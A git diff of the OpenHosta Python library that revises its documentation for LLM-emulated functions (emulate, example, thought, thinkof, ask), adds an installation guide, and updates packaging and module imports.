-Be careful, you can put regular instructions in your function and they will be executed. However, `emulate` retrieves all the variables local to the functions and gives them to the LLM as a context.
+Be careful, you can put regular instructions in your function and they will be executed. However, `emulate` can retrieve all the variables local to the function and give them to the LLM as context with the `use_locals_as_ctx` parameter (set to `True`). If your emulated function is a class method, `emulate` can retrieve all the attributes of this class to also give them as context with the `use_self_as_ctx` parameter.
+
+Another parameter of `emulate` is `post_callback`. It takes a callable as input and applies it to the output of the LLM. This can be useful for logging, error handling, or formatting the output of multiple emulated functions with a single function. The callable takes one argument, the output of the LLM, and must return a value. If the output of the LLM should not change during the execution of your callback, just return the value given in argument.
-emulate also accepts two other arguments: `creativity` and `diversity`. It correspond to the "temperature" and "top_p" parameters of LLMs. These values range from 0 to 1 (inclusive). For more information, please refer to the official [OpenAI documentation](https://openai.com/).
+`emulate` also accepts other unspecified arguments: they correspond to the parameters of the LLM.
+You can find these in your model's official documentation, but here are a few common ones:
+ - `temperature`
+ - `top_p`
+ - `max_tokens`
+ - (...)
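Illustratively, forwarding such unspecified arguments usually amounts to a keyword-argument passthrough. The helper below is a hypothetical sketch, not OpenHosta's actual implementation:

```python
# Hypothetical sketch: extra keyword arguments are forwarded untouched
# as LLM request parameters (temperature, top_p, max_tokens, ...).
def build_llm_request(prompt: str, **llm_params) -> dict:
    request = {"prompt": prompt}
    request.update(llm_params)
    return request

req = build_llm_request("Translate to French: Hello", temperature=0.2, max_tokens=64)
print(req["temperature"], req["max_tokens"])  # 0.2 64
```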
-#### Supported types & Pydantic
+### Supported types & Pydantic
`emulate` support for the **typing** module: You can now use specific return types from the typing module, including [`List`, `Dict`, `Tuple`, `Set`, `FrozenSet`, `Deque`, `Iterable`, `Sequence`, `Mapping`, `Union`, `Optional`, `Literal`].
+> **Note:**
+> Annotating your function's return value as `Optional` tends to make the LLM respond with `None` in case of an inconsistent input. This can become useful when using `OpenHosta` in larger and more complex programs.
+
```python
from OpenHosta import emulate
+from typing import Dict, Tuple, List
def analyze_text(text: str) -> Dict[str, List[Tuple[int, str]]]:
"""Analyze text to map each word to a list of tuples containing word length and word."""
@@ -240,8 +244,6 @@ print(type(analysis))
It also includes a verification output that checks and converts the output to the specified type if necessary. Supported types include **Pydantic** models, all types from the **typing** module mentioned above, as well as built-in types such as `dict`, `int`, `float`, `str`, `list`, `set`, `frozenset`, `tuple`, and `bool`.
The `complex` type is not supported. If you need to use complex numbers, please pass them as a `tuple` and manually convert them after processing.
-For more information about Typing module, please check the official [Typing documentation](https://docs.python.org/3/library/typing.html)
-
OpenHosta integrates with Pydantic, a library for data validation and settings management using Python type annotations. This integration allows you to use Pydantic models directly within `emulate`, ensuring data consistency and validation.
Pydantic provides a way to define data models using Python types. It automatically validates and converts input data to match these types, ensuring that your application processes data safely and accurately.
@@ -257,18 +259,17 @@ OpenHosta supports Pydantic typing by accepting Pydantic models as input of an e
- **Data Parsing:** Converts input data to specified types, simplifying data handling.
The Pydantic model will be automatically processed by our tools and the LLM to guarantee a stable output.
+The Pydantic model cannot be defined inside a function, as this will produce an error.
Let's take the same example, but using this feature:
```python
from pydantic import BaseModel
-from OpenHosta import emulate, config
+from OpenHosta import emulate
class Person(BaseModel):
name: str
age: int
-config.set_default_api_key("put-your-api-key-here")
-
def find_first_name(sentence:str)->Person:
"""
This function find in a text the name and the age of a person.
@@ -283,226 +284,73 @@ def find_first_name(sentence:str)->Person:
return emulate()
```
-Note that the Pydantic model cannot be defined inside a function, as this will produce an error.
-
-### "suggest" Function
+### Body Functions
-When you use the emulate function, an attribute is automatically attached. This attribute is a function giving you hints on how to improve your prompt, and a diagram visualization tool. This tool uses the default model to operate.
+In addition to the docstring-as-prompt, you can enhance your prompting with specialized functions. This way you can try different techniques like Zero-/Few-shot prompting or Chain-of-Thought. If you're not familiar with these concepts, please check the [References](#references) section.
-#### Usage
+#### `Example`
-Here's how to use it:
+The first body function is `example`. It allows you to give examples to the LLM.
```python
-def find_occurence_of_a_word(word :str, text: str) -> int:
+from OpenHosta import emulate, example
+
+def is_positive(sentence:str)->bool:
"""
- This function takes a word and a text and returns
- the number of times the word appears in the text.
+    This function returns True if the sentence given as parameter is positive, False otherwise.
"""
+ example(sentence="Marc got a good mark in his exam.", hosta_out=True)
+ example(sentence="The weather is awful today !", hosta_out=False)
return emulate()
-find_occurence_of_a_word("Hello", "Hello World Hello!")
-
-print(suggest(multpily)) # to have the raw message
-print(multiply.diagram) # to have just the diagram
-
-find_occurence_of_a_word.__suggest__(find_occurence_of_a_word) # same
-print(find_occurence_of_a_word.advanced)
-```
+print(is_positive("I can do it !")) # True
-In this example, you can see that after calling the emulated function, we can call `suggest`, which takes as arguments the function object to which it is hooked. After that, we have four new attributes at our disposal:
- - `enhanced prompt`: It's a proposal to improve the function's prompt.
- - `review`: This is the analysis provided by the AI for its prompt improvement. Can be useful to understand its reasoning.
- - `advanced`: Similar to `enhanced prompt` but adds an iteration. The AI will then try to solve advanced problems according to context or other factors. Especially useful in the most complex cases.
- - `diagram`: Gives a Mermaid diagram showing the stages of AI thinking. Useful if you want to try coding the function yourself.
-
-You can also retrieve the entire LLM response by storing the output of the `suggest` function.
-
-Note that this feature uses the default model.
-
-You can also retrieve the entire LLM response by storing the output of the `suggest` function.
-
-Note that this feature uses the default model.
-
-#### Output Examples
-
-- **Enhanced prompt:**
-This function takes two inputs: a word (string) and a text (string). It returns an integer representing the number of times the specified word appears in the given text. The function should be case-insensitive, meaning it should count occurrences of the word regardless of whether it is in uppercase or lowercase. Additionally, the function should handle punctuation properly, ensuring that words followed by punctuation marks are still counted correctly. The function should also include error handling to manage cases where the inputs are not strings or are empty.
-- **Review:**
-The prompt is clear but lacks specificity in handling edge cases and punctuation. It also doesn't specify how to handle different forms of the word, such as plural or possessive forms. Furthermore, it doesn't mention whether the function should count overlapping occurrences of the word. The prompt could benefit from more detailed requirements to ensure robustness and accuracy.
-- **Advanced:**
-This function takes two inputs: a word (string) and a text (string). It returns an integer representing the number of times the specified word appears in the given text. The function should be case-insensitive, meaning it should count occurrences of the word regardless of whether it is in uppercase or lowercase. It should handle punctuation properly, ensuring that words followed by punctuation marks are still counted correctly. The function should not count overlapping occurrences of the word. Additionally, the function should include error handling to manage cases where the inputs are not strings or are empty. It should also handle different forms of the word, such as plural or possessive forms, by considering only exact matches of the word.`
-- **Mermaid diagramm**
-```mermaid
-graph LR
- A[Start] --> B[Receive inputs: word and text]
- B --> C{Are inputs valid?}
- C -- No --> D[Return error]
- C -- Yes --> E[Convert both inputs to lowercase]
- E --> F[Remove punctuation from text]
- F --> G[Split text into words]
- G --> H[Count exact matches of the word]
- H --> I[Return the count]
- I --> J[End]
+# It will be written as follows in the final prompt:
+#######
+# Here are some examples of expected input and output:
+#[{'in_': {'sentence': 'Marc got a good mark in his exam.'}, 'out': True}, {'in_': {'sentence': 'The weather is awful today !'}, 'out': False}]
```
+As shown above, `example` takes two kinds of arguments. First, the input parameters, which must be named (kwargs) and match exactly the number and types of the parameters in the function's definition. Finally, there's the `hosta_out` parameter, which corresponds to the expected LLM output.
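The rendered form shown in the comment above can be reproduced with a few lines of plain Python. This is a simplified sketch of the mechanism, not OpenHosta's actual code:

```python
# Simplified sketch: collect few-shot examples, then render them into a prompt section.
examples = []

def record_example(hosta_out, **kwargs):
    # kwargs mirror the emulated function's named parameters
    examples.append({"in_": kwargs, "out": hosta_out})

record_example(sentence="Marc got a good mark in his exam.", hosta_out=True)
record_example(sentence="The weather is awful today !", hosta_out=False)

prompt_section = (
    "Here are some examples of expected input and output:\n" + str(examples)
)
```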
----
-
-## `predict` Function
-
-The `predict` function is the second major feature of OpenHosta, designed to enable the dynamic creation of models for specific functions. While it shares similarities with the `emulate` function, instead of making API calls to a large language model (LLM), `predict` generates an internal model—currently supporting only linear regression.
-
-### How `predict` Works
-
-The `predict` function allows users to train a model automatically by providing a set of training examples. It simplifies model-building by handling the training process directly within a Python function.
-
-At this time, `predict` has a few **limitations** to be aware of:
-
-- **Supported Input Types**: Only `int` and `float` types are allowed as inputs.
-- **Return Type**: The function returns output as a `float`.
-- **Model Type**: Currently, the function builds a simple linear regression model with a single output.
-- **Training Examples**: You must provide at least one example for the model to be trained correctly.
-
-### Limitations and Known Issues
-
-- Since `predict` is still in its Release Candidate (RC) phase, some instability and bugs might occur.
-- If you encounter any issues, please help improve the functionality by reporting them :)
----
+Giving inconsistent examples can severely impact LLM performance, but used properly it can be a very effective tool.
+#### `Thought`
-- *Below is a practical example demonstrating how to use `predict` to build a model that estimates a person's chance of dying based on their age*:
+The second body function is `thought`. It allows you to create a chain of thought inside your prompt to enhance its performance on more complex tasks.
```python
-from OpenHosta import predict, example
+from OpenHosta import emulate, thought
+from typing import List, Optional
-def find_chance_of_die(age: float) -> float:
+def car_advice(query:str, car_available:List[str])->Optional[str]:
"""
- This function predicts the chance of dying in a percentage value from 0 to 1,
- based on the age (with the baseline year starting at 1900).
+    This function gives the best advice for the query given as parameter. It must return the car from the list "car_available" that best fits the user's needs.
+ If no car fit the user's needs, this function returns None.
"""
- # We forced some interpolation not real data
- example(age=124.0, hosta_out=0.99)
- example(age=100.5, hosta_out=0.20)
- example(age=55.0, hosta_out=0.60)
- example(age=45.0, hosta_out=0.10)
- example(age=24.8, hosta_out=0.20)
- example(age=8.0, hosta_out=0.01)
- return predict()
-
-x = find_chance_of_die(124.0)
-print(x)
-```
-For `example` documentation, please go to this [link](#example-function)
-
-### `predict` Function Parameters
-
-The `predict` function includes several parameters that allow you to fine-tune the model's behavior. Below is a list of these parameters:
-
-- **`epochs` (int)**:
- Defines how many times the model iterates over the training set. Increasing the number of epochs may lead to better model convergence at the cost of longer training times. The default value is 2 times the dataset size, calculated based on the batch size.
-
-- **`complexity` (int)**:
- Sets the level of complexity for the model, which influences the number of weights based on the length of the input. The default value is `5`.
-
-- **`normalization` (bool)**:
- Enables or disables data normalization. When set to `True`, the input data will be normalized based on the `norm_min` and `norm_max` values. The default is `False`.
-
-- **`norm_min` (float)**:
- Defines the minimum value for data normalization. This value helps scale input data to a normalized range. The default is `0.1` for value that are different than 0.
-
-- **`norm_max` (float)**:
- Specifies the maximum value for data normalization. This value sets the upper bound for the normalized range. The default is `1.0`.
-
-- **`verbose` (bool)**:
- Enables or disables verbose output during training. When set to `True`, detailed progress information, including loss values, will be displayed. The default is `False`.
-
-- **`batch_size` (int)**:
- Defines the number of training examples to be used in one iteration. By default, it is set to `5%` of the dataset size or `len(dataset)` if the dataset size is too small for 5%.
-
----
-
-### Additional `predict` Functionalities
-
-The `predict` function also comes with several methods designed to enhance the user experience when building and refining an *Hosta model*. Below are the key methods you can use to interact with and further train your models:
-
-#### 1. `retrain`
-
-The `retrain` method allows you to retrain the model from scratch. It takes several directive parameters:
-
-- **`epochs`**: Specifies the number of training epochs.
-- **`get_loss`**: Defines a target loss for the model to reach during training.
-- **`verbose`**: Displays detailed training information (if set to `True`).
-
-#### Example:
-```python
-find_chance_of_die.retrain(epochs=150, get_loss=0.001, verbose=True)
-```
-
-#### 2. `continue_train`
-
-The `continue_train` method allows you to continue training the model using the current weights, rather than starting from scratch. It also accepts directive parameters:
-
-- **`epochs`**: Specifies how many additional epochs you want to train the model for.
-- **`get_loss`**: Defines a target loss value for the model to reach during continued training.
-- **`verbose`**: Displays training progress information (if set to `True`).
-
-#### Example:
-```python
-find_chance_of_die.continue_train(epochs=150, get_loss=0.001, verbose=True)
-```
-
-#### 3. `emulate`
-
-The `emulate` function makes an API call to a Large Language Model (LLM) to assist in answering predictions made by the `predict` function. For more details, check the documentation of [predict](#predict-function).
-
-#### Example:
-```python
-find_chance_of_die.emulate(124.0)
-```
-
----
-
-
-### TrainingSet Management
-
-The `TrainingSet` feature offers easy tools for managing training datasets in `hosta_injected` functions:
-
-- **`.visualize`**: View the current dataset and its examples.
-- **`.add`**: Add new examples to the dataset.
-
-#### Example:
-
-You can generate and add data to your training set like so:
-
-```python
-
-def cos_plus_sin_generator():
- for i in range(0, 10):
- for j in range(0, 10):
- cos_value = math.cos(i) ** i
- sin_value = math.sin(j) ** j
- training_maths.add(cos=i, sin=j, hosta_out=cos_value + sin_value)
- # Add data to the training set
+ thought("identify the context and the need of the user")
+ thought("Look at the car available to find a car matching his needs")
+ thought("Return the name of the most relevant car, if no car is matching return None")
+ return emulate()
-cos_plus_sin_generator()
-training_maths.visualize() # Visualize the dataset
+car_list = [
+ "Lamborghini Aventador LP700-4",
+ "Volkswagen Coccinelle type 1",
+ "Ford Mustang 2024"
+]
+
+print(car_advice("I live in the center of a big city with a lot of traffic, what do you recommend ?", car_list))
+# Volkswagen Coccinelle type 1
+print(car_advice("I would like to buy a new car, but I would like an electric one because I don't want to ruin my planet.", car_list))
+# None
+
+# It will be written as follows in the final prompt:
+#####
+# To solve the request, you have to follow these intermediate steps. Give only the final result, don't give the result of these intermediate steps:
+# [{'task': 'identify the context and the need of the user'}, {'task': 'Look at the car available to find a car matching his needs'}, {'task': 'Return the most relevant car, if no car is matching return None'}, {'task': 'identify the context and the need of the user'}, {'task': 'Look at the car available to find a car matching his needs'}, {'task': 'Return the most relevant car, if no car is matching return None'}]
```
-This allows you to both populate and inspect your training data with ease.
-
----
-
-### Training Output of predict
-
-When training the model using `predict`, a corresponding folder will be created under `__hostachache__`. This folder will contain:
-- `config.json`: Configuration file describing model parameters like structure, training data, etc.
-- `model.pth`: The serialized weights of the trained model.
-- `normalization.json`: Values for data normalization to ensure consistent input/output scaling.
-
-These files are used to manage the model, its saved state, and how incoming data will be normalized before being processed.
-
-## `thought` Function
+## `thinkof` Function
**Lambda** functions in Python provide a way to create small, anonymous functions. These are defined using the lambda keyword and can have any number of input parameters but only a single expression.
@@ -513,103 +361,80 @@ These files are used to manage the model, its saved state, and how incoming data
For more information, please check https://python-reference.readthedocs.io/en/latest/docs/operators/lambda.html
-In an aim to integrate with Python syntax, we've developed the `thought` function. It replicates the same behavior as lambda.
+With the aim of integrating with Python syntax, we've developed the `thinkof` function. It replicates the same behavior as a lambda.
Here's how it works:
```python
-from OpenHosta import thought
+from OpenHosta import thinkof
-x = thought("Is it a masculine name")
+x = thinkof("Is it a masculine name")
print(x("John")) # True
-result = thought("Multiply by two")(2)
+result = thinkof("Multiply by two")(2)
print(result) # 4
```
-In the example above, we can see two distinct ways of using `thought`. In the first example, you can store a lambda function in a variable and then use it. You can also call it directly by enclosing the arguments behind it in brackets. `thought` accepts multiple arguments and all types native to python. However, the content of the first bracket is always a string.
+In the example above, we can see two distinct ways of using `thinkof`. In the first example, you can store the function in a variable and then use it. You can also call it directly by enclosing the arguments behind it in parentheses. `thinkof` accepts multiple arguments and all types native to Python. However, the content of the first parentheses is always a string.
-The `thought` function has an initial pre-compilation stage where it predicts the type of the return value by making an initial call to an LLM. Execution time can therefore be increased.
+The `thinkof` function has an initial pre-compilation stage where it predicts the type of the return value by making an initial call to an LLM. Execution time is therefore increased the first time the function is used; the type is then stored and reused for subsequent executions.
You can retrieve the predicted return type with the `_return_type` attribute attached to the object:
```python
-from OpenHosta import thought
+from OpenHosta import thinkof
-x = thought("Adds all integers")
+x = thinkof("Adds all integers")
ret = x(2 ,3 ,6)
print(x._return_type) # int
```
**Note** : ***this feature uses the default model.***
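The caching behaviour described above can be sketched in plain Python. In the real library the type prediction is an LLM call; here a stand-in infers the type from the first result, and the wrapper class name is hypothetical:

```python
# Sketch: infer the return type on the first call, then reuse the cached type.
class CachedTypeFn:
    def __init__(self, fn):
        self.fn = fn
        self._return_type = None  # filled on first call ("pre-compilation")

    def __call__(self, *args):
        result = self.fn(*args)
        if self._return_type is None:
            self._return_type = type(result)  # stand-in for the LLM's type prediction
        return result

add_all = CachedTypeFn(lambda *xs: sum(xs))
add_all(2, 3, 6)  # first call also fills _return_type
```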
-## `example` Function
+## `ask` function
-The "example" function is designed to enhance the context of a function for a LLM by adding examples to it. This functionality is encapsulated in the `example` function.
-
-**Key Characteristics**
-
-- **Versatile**: The "example" function can be used both inside and outside a function to specify examples.
-- **Save**: The "example" function provides a tool called `save_examples` that can store all the examples added to a specified function in a ***JSONL*** file.
-- **Load**: The function also offers a tool called `load_training_example` to load a file into the context of the function especially for `predict function`.
-
-***Notes : `load_examples` can load `csv`, `json` or `jsonl` file for the moment***
-
-Here's how it works:
+The `ask` function is a sort of *side* function in OpenHosta. Its only use is to make a simple LLM call without OpenHosta's meta-prompt. It simplifies the process of an API call.
```python
-from OpenHosta import emulate, example
-
-def translate(text:str, language:str)->str:
- """
- This function translates the text in the “text” parameter into the language specified in the “language” parameter.
- """
- example("Bonjour Monde !", "portuguese", hosta_out="ola mundo" )
- return emulate()
-
-
-example(text="Hello World !", language="japanese", hosta_out="こんにちは世界!", hosta_func=translate)
-
-print(translate("Hello World !", "French"))
+from OpenHosta import ask, Model
+
+print(
+ ask(
+        system="You're a helpful assistant.",
+        user="Write me a cool story.",
+        max_tokens=200
+ )
+)
```
-The `example` function will verify the correlation between the specified input and the parameters of the function. The output should be specified only in the *hosta_out* parameter. If the example are used outside a function, please use the *hosta_func* parameter to specify a function.
-
-Now here's how works `save_examples` and `load_training_example`
+The "traditional" way would look like this:
```python
-from OpenHosta import save_examples, load_training_example
-
-save_examples(hosta_func=translate, hosta_path="translate_func_example")
+import openai
-#######
-
-def another_translate(text:str, language:str)->str:
- """
- This function translates the text in the “text” parameter into the language specified in the “language” parameter.
- """
- return emulate()
+openai.api_key = "your-api-key-here"
-load_training_example(hosta_path="translate_func_example.jsonl", hosta_func=another_translate)
-```
+messages = [
+ {"role": "system", "content": "You are a helpful assistant."},
+ {"role": "user", "content": "Write me a cool story."}
+]
-output of the `translate_func_example.jsonl`
+response = openai.ChatCompletion.create(
+ model="gpt-4o",
+ messages=messages
+)
-```JsonL
-{"text": "Hello World !", "language": "japanese", "hosta_out": "こんにちは世界!"}
-{"text": "Bonjour Monde !", "language": "portuguese", "hosta_out": "ola mundo"}
+print(response['choices'][0]['message']['content'])
```
+As seen above, `ask` takes two or more arguments. The first two are mandatory: `system` corresponds to the system prompt given to the LLM, and `user` to the user prompt. You can also set the `model` parameter to a custom `Model` instance. It also handles all LLM parameters (`max_tokens`, `n`, `top_p`...).
-**Notes**: *All examples provided for a function are stored in a directory at the root of your environment. You can see it as* ***\_\_hostacache__***.
-
-
-
-### Advanced configuration
+**Note** : ***this feature uses the default model.***
+## Advanced configuration
-#### Introduction
+### Models
-This section explains how to customize the program to make its own LLM call and response handling functions. This can be useful if you need a specific functionality that is not provided by the standard library, or to enable compatibility with a specific LLM.
+This section explains how to customize the program to make its own LLM call and response handling functions. This can be useful if you need a specific functionality that is not provided by the standard library, or to enable compatibility with a specific LLM.
#### Inheriting from the Model Class
@@ -714,14 +539,64 @@ ret = x("Hello World")
print(ret)
```
+### Prompts
+
+#### Edit the prompt
+
+`emulate` works by putting the emulated function's parsed data in a meta-prompt designed to give the best performance and ensure a consistent output format. But you can edit different parts of this meta-prompt. Here's how to do it.
+
+You first need to import `EMULATE_PROMPT`
+
+```python
+from OpenHosta import EMULATE_PROMPT
+```
+
+This is an instance of a class containing attributes. These attributes are all the separate parts (named "shards") of the prompt, which are then combined to build the final prompt. You only need to change these attributes to change the prompt automatically.
+
+Here's all the shards:
+- **CTX_MAIN**: The main context given to the LLM.
+- **CTX_SEP1**: The separator between the context and the example.
+- **CTX_EXAMPLE**: The examples describing the overall functioning of OpenHosta.
+- **CTX_SEP2**: The separator between the context and the emulated function's information.
+- **PRE_DEF**: The sentence introducing the function's definition.
+- **PRE_TYPE**: The sentence introducing the function's annotations.
+- **PRE_SCHEMA**: The sentence introducing the function's return type's schema.
+- **PRE_LOCALS**: The sentence introducing the function's local variables (Optional).
+- **PRE_SELF**: The sentence introducing the function's local attributes (Optional).
+- **PRE_EXAMPLE**: The sentence introducing the examples given by the user (Optional).
+- **PRE_COT**: The sentence introducing the Chain-of-Thought (Optional).
+- **USER_SEP**: The separator between the system prompt and the user prompt.
+
+You can find all the separated values by visiting the [meta_prompt.py](../src/OpenHosta/utils/meta_prompt.py) file.
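Conceptually, the final prompt is just the shards joined in order. Here is a minimal, self-contained illustration of that idea; the shard names follow the list above, but the container class and assembly logic are assumptions, not OpenHosta's real implementation:

```python
# Minimal stand-in for the shard container: editing an attribute changes the prompt.
class PromptShards:
    CTX_MAIN = "You emulate a Python function."
    CTX_SEP1 = "\n---\n"
    CTX_EXAMPLE = "Example: given a signature and arguments, return the result."
    PRE_DEF = "Here is the function definition:"

def build_prompt(shards):
    # Join the shards in order to form the final system prompt.
    return "".join([shards.CTX_MAIN, shards.CTX_SEP1,
                    shards.CTX_EXAMPLE, shards.CTX_SEP1, shards.PRE_DEF])

shards = PromptShards()
shards.CTX_MAIN = "You are a precise function emulator."  # edit one shard...
prompt = build_prompt(shards)                             # ...the prompt follows
```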
+
+To see the fully filled prompt sent to the LLM, you can also use the `print_last_prompt` function:
+
+```python
+from OpenHosta import emulate, print_last_prompt
+
+def multiply(a:int, b:int)->int:
+ """
+ This function multiplies two integers in parameter.
+ """
+ return emulate()
+
+multiply(5, 6)
+print_last_prompt(multiply)
+```
+
---
-### References
+## References
- **LLM**: https://en.wikipedia.org/wiki/Large_language_model
- **GPT-4o**: https://en.wikipedia.org/wiki/GPT-4o
- **AI**: https://en.wikipedia.org/wiki/Artificial_intelligence
- **NLP**: https://en.wikipedia.org/wiki/Natural_language_processing
+- **Zero-Shot Prompting**: https://www.promptingguide.ai/techniques/zeroshot
+- **Few-Shot Prompting**: https://www.promptingguide.ai/techniques/fewshot
+- **Chain-of-Thought**: https://www.promptingguide.ai/techniques/cot
---
diff --git a/docs/installation.md b/docs/installation.md
new file mode 100644
index 0000000..aa2a67b
--- /dev/null
+++ b/docs/installation.md
@@ -0,0 +1,139 @@
+# Installation
+
+The `OpenHosta` Python package contains multiple features which you can install via PyPI or GitHub. However, depending on how you use `OpenHosta`, you may need to install other packages, since some features require additional dependencies. You'll also need to set up your API key for easier use.
+All of this is detailed in this document.
+
+## Prerequisites
+
+1. **Python 3.10 | 3.11 | 3.12**
+ - Download and install Python from [python.org](https://www.python.org/downloads/).
+
+2. **pip**
+ - `pip` is generally included with Python. Verify its installation with:
+ ```sh
+ pip --version
+ ```
+
+## OpenHosta Installation
+
+### **Install using `pip`**:
+ 1. Install the package
+ ```sh
+ pip install -U OpenHosta[all]
+ ```
+ 2. Verify installation
+ ```sh
+ pip show OpenHosta
+ ```
+### **Install using `GitHub`**
+ 1. Clone the Git repository:
+
+ ```sh
+ git clone [email protected]:hand-e-fr/OpenHosta.git
+ ```
+
+    2. Navigate to the directory:
+
+ ```sh
+ cd OpenHosta
+ ```
+
+ 3. Install the package.
+
+ ```sh
+ pip install .[all]
+ ```
+
+ 4. Verify installation
+
+ ```sh
+ python -c "import OpenHosta; print(OpenHosta.__version__)"
+ ```
+
+Installing OpenHosta with GitHub gives you access to all the source code, allowing you to take over the tool and perhaps contribute to the project, but the pip approach is simpler for classic OpenHosta use.
+
+## Additional Dependencies
+
+You can install additional dependencies to use deeper features of `OpenHosta`. You'll need to add the following options.
+
+> **Note**
+> `OpenHosta` base features are "Pure Python". This means that it contains 0 dependencies. It includes the `emulate` function and all its related functionalities (`config`, `example`, `thought`), the `thinkof` function and the `ask` function.
+> However, you don't have access to `predict` and the `pydantic` compatibility.
+```sh
+pip install -U OpenHosta # With pip
+```
+*or*
+```sh
+pip install . # With GitHub
+```
+
+### `predict`
+
+Adds the `predict` function and all its features.
+```sh
+pip install -U OpenHosta[predict]
+```
+
+### `pydantic`
+
+Adds the `pydantic` compatibility with all functions.
+```sh
+pip install OpenHosta[pydantic]
+```
+*or*
+```sh
+pip install pydantic # Basically the same
+```
+
+### `dev`
+
+*Not included in "all"*
+
+Adds all the useful OpenHosta development tools for those who'd like to contribute.
+```sh
+pip install .[dev] # Useful only with the GitHub install; you won't need it if you're not interested in contributing to OpenHosta
+```
+
+### `tests`
+
+*Not included in "all"*
+
+Adds all the packages used for running `OpenHosta`'s tests.
+```sh
+pip install .[tests] # Also only useful with the GitHub install
+```
+
+### Combining Options
+
+All options can be combined as needed.
+
+For example, if you're a contributor, it might be useful to install `dev` and `tests` packages:
+```sh
+pip install .[dev, tests]
+```
+Note that the `pydantic` and `predict` packages combined are the same as `all`.
+
+## API Key Setup
+
+1. Get an API key from your favorite provider. The default model is OpenAI's `GPT-4o`; you can get a key from https://platform.openai.com/account/api-keys
+2. Then all you have to do is set an environment variable containing this API key:
+ - Windows:
+ ```sh
+ setx OPENAI_API_KEY "your-openai-api-key"
+ ```
+ - MacOS/Linux:
+ ```sh
+ # in your .bashrc or .zshrc
+    export OPENAI_API_KEY='your-openai-api-key'
+ ```
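Once the variable is set, it can be read from Python with the standard library; the default model setup reads it the same way via `os.getenv`. A quick sanity check (the key value below is obviously a placeholder):

```python
import os

# Set here only for demonstration; normally the shell exports this variable.
os.environ["OPENAI_API_KEY"] = "sk-demo-not-a-real-key"

api_key = os.getenv("OPENAI_API_KEY")
if api_key is None:
    raise RuntimeError("OPENAI_API_KEY is not set")
```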
+
+## Common Issues
+
+If you encounter a problem, try these methods, which may fix it:
+
+- Update pip: ``pip install --upgrade pip``
+- Use virtual environment
+- Try ``pip3`` instead of ``pip``
+- Use ``sudo`` (Unix) or run as administrator (Windows) if permission errors occur
+
+For more help, and if the problem persists, please file an issue on GitHub.
diff --git a/pyproject.toml b/pyproject.toml
index fd7be4f..1ec95fb 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta"
[project]
name = "OpenHosta"
-version = "1.2.1"
+version = "2.0beta2"
description = "Open-Source programming project IA integretion in developement environnement"
keywords = ["AI", "GPT", "Natural language", "Autommatic", "Easy"]
authors = [
@@ -26,13 +26,34 @@ classifiers = [
"Topic :: Software Development :: Code Generators"
]
dependencies = [
- "requests>=2.32.3",
- "pydantic>=2.8.2",
- "tiktoken>=0.7.0",
- "jsonschema>=4.23.0",
- "typing-extensions>=4.12.2",
- "numpy>=2.1.1",
- "torch>=2.3.1"
+ "requests>=2.32.3"
+]
+
+[project.optional-dependencies]
+all = [
+ "pydantic>=2.8.2",
+ "torch>=2.5.1"
+]
+pydantic = [
+ "pydantic>=2.8.2"
+]
+dev = [
+ "mypy>=1.13.0",
+ "isort>=5.13.2",
+ "autopep8>=2.3.1",
+ "pylint>=3.3.1",
+ "pyflakes>=3.2.0",
+ "bandit>=1.7.10"
+]
+tests = [
+ "pytest>=8.3.2",
+ "pytest-cov>=5.0.0",
+ "pillow>=11.0.0",
+ "pydantic>=2.8.2",
+ "Flask>=3.0.3"
+]
+predict = [
+ "torch>=2.5.1"
]
[project.urls]
@@ -46,11 +67,24 @@ package-dir = { "" = "src" }
where = ["src"]
[tool.setuptools.package-data]
-"OpenHosta" = ["*.json"]
-
-[tool.pytest.ini_options]
-testpaths = [
- 'tests/functionnalTests',
- 'tests/unitTests',
- 'tests/performanceTests'
-]
\ No newline at end of file
+"OpenHosta" = ["utils/*.json"]
+
+[tool.bandit]
+skips = ["B112"]
+targets = ["src/OpenHosta"]
+recursive = true
+
+[tool.pylint]
+disable = [
+ "C0111",
+ "C0103",
+ "C0114",
+ "C0115",
+ "C0116",
+ "R0903",
+ "C0415"
+]
+max-line-length = 120
+
+[tool.mypy]
+disable_error_code = ["attr-defined"]
\ No newline at end of file
diff --git a/src/.gitignore b/src/.gitignore
deleted file mode 100644
index cf1e07b..0000000
--- a/src/.gitignore
+++ /dev/null
@@ -1,1 +0,0 @@
-OpenHosta.egg-info/*
\ No newline at end of file
diff --git a/src/OpenHosta/OpenHosta.py b/src/OpenHosta/OpenHosta.py
index 762efae..2d40c68 100644
--- a/src/OpenHosta/OpenHosta.py
+++ b/src/OpenHosta/OpenHosta.py
@@ -1,32 +1,44 @@
-from .config import Model, DefaultManager
+from __future__ import annotations
+from .exec.ask import ask
+from .exec.predict.model import ArchitectureType
+from .exec.predict.predict_config import PredictConfig
+from .exec.predict.predict import predict
+from .utils.meta_prompt import EMULATE_PROMPT
+from .exec.thinkof import thinkof
+from .exec.thought import thought
+from .exec.example import example
+from .exec.emulate import emulate
+from .core import config
+from .core.config import Model, DefaultManager
+from .utils.meta_prompt import print_last_prompt
+
+import os
DefaultManager.set_default_model(
- Model(model="gpt-4o", base_url="https://api.openai.com/v1/chat/completions")
+ Model(model="gpt-4o", base_url="https://api.openai.com/v1/chat/completions",
+ api_key=os.getenv("OPENAI_API_KEY") or None)
)
-from .emulate import _exec_emulate
-from .predict import _exec_predict
-from .trainset import TrainingSet
-from . import config
-from .thought import thought
-from .exec import HostaInjector
-from .example import example, save_examples, load_training_example
-from .enhancer import suggest
-
-emulate = HostaInjector(_exec_emulate)
-predict = HostaInjector(_exec_predict)
+from .core import config
+from .exec.emulate import emulate
+from .exec.example import example
+from .exec.thought import thought
+from .exec.thinkof import thinkof
+from .exec.predict.predict import predict
+from .exec.predict.predict_config import PredictConfig
+from .exec.predict.model import ArchitectureType
+from .exec.ask import ask
-__all__ = (
+__all__ = (
+    "config",
"emulate",
"thought",
-    "example",
-    "save_examples",
-    "load_training_example",
-    "TrainingSet",
-    "config",
-    "Model",
-    "DefaultManager",
-    "suggest",
-    "predict"
+    "example",
+    "thinkof",
+    "ask",
+    "EMULATE_PROMPT",
+    "predict",
+    "PredictConfig",
+    "ArchitectureType",
+    "print_last_prompt"
)
-
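The rewritten `OpenHosta.py` above now initialises the default model at import time, reading the API key from the `OPENAI_API_KEY` environment variable instead of requiring an explicit call. The singleton pattern behind `DefaultManager` can be sketched in isolation — class and method names mirror `core/config.py`, but the `Model` stub here is simplified for illustration:

```python
import os

class Model:
    """Simplified stand-in for OpenHosta's Model (core/config.py)."""
    def __init__(self, model=None, base_url=None, api_key=None):
        self.model = model
        self.base_url = base_url
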